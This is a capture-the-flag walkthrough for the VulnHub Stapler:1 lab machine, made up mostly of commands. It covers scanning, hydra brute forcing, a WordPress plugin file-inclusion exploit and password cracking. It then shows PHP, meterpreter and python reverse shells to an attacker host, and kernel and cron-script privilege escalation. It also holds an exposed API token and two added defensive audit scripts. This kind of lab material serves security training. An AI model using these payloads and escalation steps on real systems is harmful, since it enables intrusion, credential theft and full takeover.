Target machine: https://www.vulnhub.com/entry/stapler-1,150/

Host discovery
nmap 192.168.75.0/24 -sP
The target is 192.168.75.19.

Port scan
nmap 192.168.75.19 -sS -sV -A -T4
Open ports: 20, 21, 22, 53, 80, 123, 137, 138, 139, 666, 3306, 12380. (The Yujian port scanner gives the same result.)

dirb
dirb http://192.168.75.19
Visiting the paths it finds yields two files; nothing useful.

FTP
The nmap output shows that anonymous login is allowed.
ftp 192.168.75.19
This gives three names: Harry, Elly, John.

SSH
ssh John@192.168.75.19
Check the login banner for hints: it gives one more name, Barry.

Samba
SMB is a file and data sharing protocol that uses ports 139 and 445. It lets you share files or data from a local computer to a server, and when you log in with the smbclient tool you can also reach other users' files or data. Like FTP on port 21 it talks to a file server, but it is a more advanced version.
The smbclient command belongs to the Samba suite and provides an interactive command-line way of accessing the shares on a Samba server. Enum4linux is a tool for enumerating information from Windows and Samba systems.

smbclient
Reference: https://stc214.github.io/posts/2021%E5%B9%B42%E6%9C%886%E6%97%A513/
smbclient -L 192.168.75.19 -N
smbclient //192.168.75.19/kathy
In the kathy_stuff directory there is todo-list.txt, which gives two more names: Initech, Kathy.
smbclient //192.168.75.19/tmp

Enum4linux
Reference: https://hackfun.org/2016/10/23/Kali-Linux%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B9%8Benum4linux/
enum4linux -a 192.168.75.19
This gives 30 user names.

cut
Reference: https://www.cnblogs.com/dong008259/archive/2011/12/09/2282679.html
cut is a selection command: it takes a piece of data, splits it up, and extracts the part we want. Save the 30 names to a file and pull out just the user name from each line:
cat users | cut -d '[' -f2 | cut -d ']' -f1 > users.txt
(The source shows cut with an empty delimiter, which cut rejects; the delimiters above are reconstructed for enum4linux's "user:[name] rid:[...]" output format.) Then add the earlier 7 names to users.txt.

Port 666
nc 192.168.75.19 666 > file666
file file666
unzip file666
exiftool message2.jpg
strings message2.jpg
This gives a cookie.

MySQL, port 3306
mysql -h 192.168.75.19 -P 3306
Remote login is possible. (The source has -p 3306; -p is the password option, the port option is -P.)

Port 12380: nikto
Reference: https://www.cnblogs.com/H4ck3R-XiX/p/12630031.html
nikto -h http://192.168.75.19:12380
It finds three directories and robots.txt. It also reports SSL info, which means the site has to be accessed over SSL; plain http requests are redirected back. The directories: /admin112233/, /blogblog/, /phpmyadmin/.

Exploitation

FTP brute force
hydra -L users.txt -P users.txt ftp://192.168.75.19
ftp 192.168.75.19 with SHayslett / SHayslett works, but there is nothing of interest inside.

SSH brute force
hydra -L users.txt -P users.txt ssh://192.168.75.19

Port 12380
SSL again. Look at /admin112233/, /blogblog/, /phpmyadmin/ and robots.txt one by one.

AWVS
Scanning /blogblog/ shows it is WordPress 4.2.2 with multiple vulnerabilities:
WordPress Plugin Advanced Video Embed Local File Inclusion (1.0)
WordPress 4.2.x Arbitrary File Deletion Vulnerability (4.2 - 4.2.20)

wpscan
wpscan --url https://192.168.75.19:12380/blogblog/ --disable-tls-checks --api-token h5OtnwPM6ekd5w5vZvjgeLUbPscgcOpe5SFt2wJTd54
--disable-tls-checks is a temporary workaround for the SSL peer certificate error. The API token can be obtained by registering on the official site; with it wpscan includes exploit information, and there is a free daily quota of API requests.

Exploiting the plugin
blogblog/wp-content/ has an exploitable vulnerability: https://www.exploit-db.com/exploits/39646
Local search on Kali:
searchsploit 39646
locate php/webapps/39646.py
cp /usr/share/exploitdb/exploits/php/webapps/39646.py .
Edit the script with vim: set the target to https://192.168.75.19:12380/blogblog/ and, because of the self-signed certificate, add
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
Reference: https://stackoverflow.com/questions/27835619/urllib-and-ssl-certificate-verify-failed-error
python 39646.py
https://192.168.75.19:12380/blogblog/wp-content/uploads/ then contains an image.
wget https://192.168.75.19:12380/blogblog/wp-content/uploads/1171105380.jpeg --no-check-certificate
(--no-check-certificate: download over SSL without verifying the certificate.)
file 1171105380.jpeg
cat 1171105380.jpeg
This gives the MySQL credentials: root / plbkac.

MySQL
mysql -uroot -pplbkac -h 192.168.75.19
show databases;
use wordpress;
show tables;
desc wp_users;
select user_login,user_pass from wp_users;
Save the user names and password hashes to the file mysqlup.

john
awk -F'|' '{print $3}' mysqlup > mysqlup.txt
john --wordlist=/usr/share/wordlists/rockyou.txt mysqlup.txt
This recovers john / incorrect. Log in at https://192.168.75.19:12380/blogblog/wp-admin; https://192.168.75.19:12380/blogblog/wp-admin/plugins.php has a file upload that can be used to get a shell.

Webshell: php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
vim shell.php (set the listener address and port)
Plugins -> Add New -> Upload Plugin, upload the PHP file.
nc -lvp 7000

weevely
weevely generate weevely weevely.php
weevely https://192.168.75.19:12380/blogblog/wp-content/uploads/weevely.php weevely

msf
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.75.1 LPORT=4455 -f raw > msf.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST 192.168.75.1
set LPORT 4455
run

MySQL INTO OUTFILE
mysql -uroot -pplbkac -h 192.168.75.19
select "" into outfile "/var/www/https/blogblog/wp-content/uploads/mysql.php";
https://192.168.75.19:12380/blogblog/wp-content/uploads/mysql.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.75.1",6688));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Privilege escalation

linpeas.sh
Enumerate with linpeas.sh:
python -m SimpleHTTPServer 8081
wget http://192.168.75.1:8081/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Kernel info
Linux version 4.4.0-21-generic

sudo privilege escalation
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

mysql
[+] Searching Wordpress wp-config.php files
/var/www/https/blogblog/wp-config.php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'plbkac');
define('DB_HOST', 'localhost');

ssh
PermitEmptyPasswords yes

Writable script in PATH
[+] .sh files in PATH
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
You can write script: /usr/local/sbin/cron-logrotate.sh

Kernel privilege escalation
Linux version 4.4.0-21-generic
./les.sh
This lists many privilege escalation methods.

dirtycow
Vulnerability article: https://www.exploit-db.com/exploits/40847
searchsploit 40847
locate linux/local/40847.cpp
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp .
wget http://192.168.75.1:8081/40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow
su root (password dirtyCowFun)
id

39772
Vulnerability article: https://www.exploit-db.com/exploits/39772
proxychains wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
wget http://192.168.75.1:8081/39772.zip
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
chmod +x compile.sh
./compile.sh
ls
./doubleput

CVE-2021-4034
proxychains git clone https://github.com/arthepsy/CVE-2021-4034.git
Works on basically any Ubuntu 16.
wget http://192.168.75.1:8081/CVE-2021-4034/cve-2021-4034-poc.c
gcc cve-2021-4034-poc.c -o exp
chmod +x exp
./exp

ssh / sudo
cd /home
grep -rn "ssh"
Information leak: credentials in a shell history file:
JKanode/.bash_history:6:sshpass -p thisimypassword ssh JKanode@localhost
JKanode/.bash_history:8:sshpass -p JZQuyIN5 peter@localhost
PermitEmptyPasswords is set to yes. Switch to a proper shell:
ssh peter@192.168.75.19 (password JZQuyIN5)
ssh peter@192.168.75.19 -t '/bin/bash'
sudo -l (password JZQuyIN5)
sudo su
id
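As a defender-side counterpart to the two SSH findings above (PermitEmptyPasswords enabled, and a password left in .bash_history by sshpass), here is an added audit script; it is not part of the original walkthrough, and the file paths and sample file contents it uses are constructed.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): a defender-side check for the
# two SSH weaknesses found above. It flags "PermitEmptyPasswords yes" in an sshd_config
# and plaintext passwords left in shell history by "sshpass -p", printing each history
# hit with the password masked. File paths are arguments so it can run on copies.

# audit_sshd_config FILE -> prints a FINDING line if empty passwords are permitted;
# returns 1 when a finding was printed, 0 otherwise. Commented-out lines are ignored.
audit_sshd_config() {
    if grep -Eiq '^[[:space:]]*PermitEmptyPasswords[[:space:]]+yes' "$1"; then
        echo "FINDING: $1 sets PermitEmptyPasswords yes"
        return 1
    fi
    return 0
}

# audit_history FILE... -> prints one FINDING line per "sshpass -p <password>" use,
# with the password replaced by <redacted>; returns 1 if anything was found.
audit_history() {
    rc=0
    for f in "$@"; do
        [ -r "$f" ] || continue
        if grep -qE 'sshpass[[:space:]]+-p[[:space:]]+[^[:space:]]+' "$f"; then
            rc=1
            grep -nE 'sshpass[[:space:]]+-p[[:space:]]+[^[:space:]]+' "$f" \
              | sed -E 's/(sshpass[[:space:]]+-p[[:space:]]+)[^[:space:]]+/\1<redacted>/' \
              | sed "s|^|FINDING: $f:|"
        fi
    done
    return $rc
}

# Constructed sample input mirroring the page's findings (temp files, not /etc or /home).
d=$(mktemp -d)
printf '%s\n' '# PermitEmptyPasswords no' 'PermitEmptyPasswords yes' > "$d/sshd_config"
printf '%s\n' 'ls' 'sshpass -p JZQuyIN5 ssh peter@localhost' > "$d/.bash_history"
audit_sshd_config "$d/sshd_config"   # FINDING: .../sshd_config sets PermitEmptyPasswords yes
audit_history "$d/.bash_history"     # FINDING: .../.bash_history:2:sshpass -p <redacted> ssh peter@localhost
rm -rf "$d"
```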
Writable sh file
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
You can write script: /usr/local/sbin/cron-logrotate.sh
cd /
grep -rn "/usr/local/sbin/cron-logrotate.sh"
cat /usr/local/sbin/cron-logrotate.sh
cat etc/cron.d/logrotate
echo "cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit" >> /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
/tmp/exploit -p
id
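The misconfiguration used above is a cron job owned by root that runs a script other users can write. Here is an added defender-side check for it; it is not part of the original walkthrough, and the cron file and script it audits are constructed temp files.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): a defender-side check for the
# "writable script run by cron" finding above. It reads a cron.d-style file, takes the
# user and the first word of the command for each job, and flags scripts that are
# group- or world-writable or owned by someone other than root or that job's user.

# cron_job_scripts CRONFILE -> one "user script" line per job (comments, blank lines
# and VAR=value lines skipped; @reboot-style jobs handled too)
cron_job_scripts() {
    awk 'NF == 0 || /^[[:space:]]*#/ { next }
         /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }
         $1 ~ /^@/ { print $2, $3; next }
         NF >= 7   { print $6, $7 }' "$1"
}

# audit_cron_file CRONFILE -> prints FINDING lines, returns 1 if any were produced
audit_cron_file() {
    findings=$(cron_job_scripts "$1" | while read -r user script; do
        if [ ! -e "$script" ]; then
            echo "FINDING: $script (runs as $user) does not exist; check whether its directory is writable"
            continue
        fi
        set -- $(ls -ld "$script")   # fields: mode links owner group ...
        mode=$1; owner=$3
        case "$mode" in
            ?????w*|????????w*) echo "FINDING: $script is group/world-writable ($mode) and runs as $user" ;;
        esac
        if [ "$owner" != root ] && [ "$owner" != "$user" ]; then
            echo "FINDING: $script is owned by $owner but runs as $user"
        fi
    done)
    [ -n "$findings" ] && printf '%s\n' "$findings"
    [ -z "$findings" ]
}

# Constructed sample mirroring the page: a root cron job running a world-writable script
# (temp files only; nothing under /etc or /usr/local is touched).
d=$(mktemp -d)
printf '#!/bin/sh\nlogrotate /etc/logrotate.conf\n' > "$d/cron-logrotate.sh"
chmod 777 "$d/cron-logrotate.sh"                            # the misconfiguration
printf '%s\n' 'SHELL=/bin/sh' "*/5 * * * * root $d/cron-logrotate.sh" > "$d/logrotate"
audit_cron_file "$d/logrotate"   # FINDING: ... is group/world-writable (-rwxrwxrwx) and runs as root
rm -rf "$d"
```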
flag
cd /root
ls
cat flag.txt